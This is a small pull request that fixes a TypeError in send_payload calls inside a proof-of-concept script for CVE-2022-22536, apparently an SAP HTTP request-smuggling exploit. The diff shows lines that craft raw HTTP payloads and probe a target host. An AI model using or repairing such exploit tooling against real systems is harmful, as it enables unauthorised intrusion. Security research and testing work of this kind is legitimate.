### PR TITLE
Fixes the TypeError in self.send_payload call

### DIFF
--- a/CVE-2022-22536.py
+++ b/CVE-2022-22536.py
@@ -100,7 +100,7 @@ class POC():
             payload = ('{method} {resource} HTTP/1.1\r\n' + 'Host: {host}:{port}\r\n\r\n')
             payload = payload.format(method='GET', resource=r, host=host, port=port)
             payload = payload.encode()
-            data = self.send_payload(s, host, port, payload)
+            data = self.send_payload(s, payload)
             resp = self.parse_response(data)
             if resp['count'] > 0 and resp['responses'][0]['status_code'] == '200':
                 logger.debug(f'Resource {r} seems valid')
@@ -132,7 +132,7 @@ class POC():
         s.connect((host, port))
         logger.debug(f'Connection established {host}:{port}')
         payload = self.craft_payload(host, port, resource=resource)
-        data = self.send_payload(s, host, port, payload)
+        data = self.send_payload(s, payload)
         results = self.parse_response(data)
         logger.debug('Response count: {}'.format(results['count']))
         self.debug_responses(results['responses'])


### PR DESCRIPTION
The function has two parameters (socket and payload), but from the code four parameters are provided (host and port).
`TypeError: send_payload() takes from 2 to 3 positional arguments but 5 were given`
